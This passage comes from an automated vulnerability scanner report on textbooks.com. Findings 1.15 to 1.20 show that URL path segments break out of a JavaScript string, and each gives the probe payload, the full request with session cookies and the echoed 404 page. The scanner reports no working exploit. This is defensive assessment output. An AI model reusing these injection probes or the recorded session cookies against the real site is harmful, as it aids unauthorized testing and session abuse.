Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3639
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:02 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog4e0c5';8fe95fbd68d/E/Education.php'

</script>
...[SNIP]...

1.15. http://www.textbooks.com/Catalog/E/Education.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/E/Education.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5082c'%3be6f007d707 was submitted in the REST URL parameter 3. This input was echoed as 5082c';e6f007d707 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/E/5082c'%3be6f007d707 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3625
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:02 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/E/5082c';e6f007d707'

</script>
...[SNIP]...

1.16. http://www.textbooks.com/Catalog/G/History-and-Geography.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/G/History-and-Geography.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 681c1'%3b7e063a79ab9 was submitted in the REST URL parameter 1. This input was echoed as 681c1';7e063a79ab9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog681c1'%3b7e063a79ab9/G/History-and-Geography.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3651
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:17 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog681c1';7e063a79ab9/G/History-and-Geography.php'

</script>
...[SNIP]...

1.17. http://www.textbooks.com/Catalog/G/History-and-Geography.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/G/History-and-Geography.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c53c0'%3b79c0a6f2e44 was submitted in the REST URL parameter 3. This input was echoed as c53c0';79c0a6f2e44 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/G/c53c0'%3b79c0a6f2e44 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:18 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/G/c53c0';79c0a6f2e44'

</script>
...[SNIP]...

1.18. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/H/Arts-and-Humanities.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50a67'%3b6a580b3f371 was submitted in the REST URL parameter 1. This input was echoed as 50a67';6a580b3f371 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog50a67'%3b6a580b3f371/H/Arts-and-Humanities.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3649
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:10 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog50a67';6a580b3f371/H/Arts-and-Humanities.php'

</script>
...[SNIP]...

1.19. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/H/Arts-and-Humanities.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d9f8'%3b6cbc548cfc4 was submitted in the REST URL parameter 3. This input was echoed as 5d9f8';6cbc548cfc4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/H/5d9f8'%3b6cbc548cfc4 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:11 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/H/5d9f8';6cbc548cfc4'

</script>
...[SNIP]...

1.20. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/HQL/General-Video-Titles.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6c22'%3b46f8934e7f2 was submitted in the REST URL parameter 1. This input was echoed as a6c22';46f8934e7f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Cataloga6c22'%3b46f8934e7f2/HQL/General-Video-Titles.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
